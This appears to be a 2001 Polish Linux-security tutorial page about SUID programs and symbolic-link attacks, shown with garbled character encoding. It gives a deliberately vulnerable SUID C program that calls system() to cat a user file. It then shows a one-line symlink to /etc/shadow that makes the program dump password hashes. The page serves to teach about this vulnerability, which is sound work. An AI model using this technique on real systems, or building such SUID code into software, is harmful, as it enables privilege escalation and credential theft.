 |
Bezpiecze±stwo system≤w Linux'owych |
|
Linux Security - Suidy
|
|
Dowi▒zania symboliczne
 |
| [1] [2] [3] [4] [5] |
|
|
Program typu SUID mo┐e wy╢wietliµ zawarto╢µ pliku, kt≤rego w│a╢cicielem jest
zwyk│y u┐ytkownik.
Przyk│adowy program mo┐e wygl▒daµ tak jak ten poni┐ej: |
[root@localhost]# cat ankieta.c
void main()
{
system ("/bin/cat /home/tronix/.form.cfg");
}
[root@localhost]# ls -l /bin/ankieta
-rwsr-sr-x 1 root root 16728 Jul 28 1999 finger
[root@localhost]# cat /home/tronix/.form.cfg
Ankieta
Imie:Jan
Nazwisko:Kowalski
Adres:Warszawa ul.Wyspia±skiego 43
|
|
Zazwyczaj uruchomienie takiego programy nie stwarza ┐adnych zagro┐e±
dla bezpiecze±stwa
|
[root@localhost]# ankieta Ankieta Imie:Jan Nazwisko:Kowalski Adres:Warszawa ul.Wyspia±skiego 43 |
|
Gdy w│amywacz jednak wie do jakiego pliku program siΩ odwo│uje i potrafi to umiejΩtnie wykorzystaµ to efekty s▒ takie:
|
[tronix@localhost]$ ln -s -f /etc/shadow ~/.form.cfg [tronix@localhost]$ ankieta root:zttJEkXo/9XCM:11389:0:99999:7::: bin:*:11389:0:99999:7::: daemon:*:11389:0:99999:7::: |
|
Oczywi╢cie to jest tylko bardzo prosty przyk│ad i sam program
mo┐e byµ o wiele bardziej rozbudowany (mo┐e np. stwarzaµ mo┐liwo╢µ
zapisu do pliku co praktycznie daje zwyk│emu u┐ytkownikowi nieograniczone mo┐liwo╢ci).
|
ICMP - Pine - Fork - Firewall - Bezpieczne partycje
Suidy - Skanowanie - Word exportable - Backdoor'y - Sumy kontrolne
Perl - Logrotate - Shell przez WWW - Forum - KsiΩga go╢ci - Statystka - Linki
Kontakt: tronix@2com.pl
Copyright by Tronix (c)2001 All Rights Reserved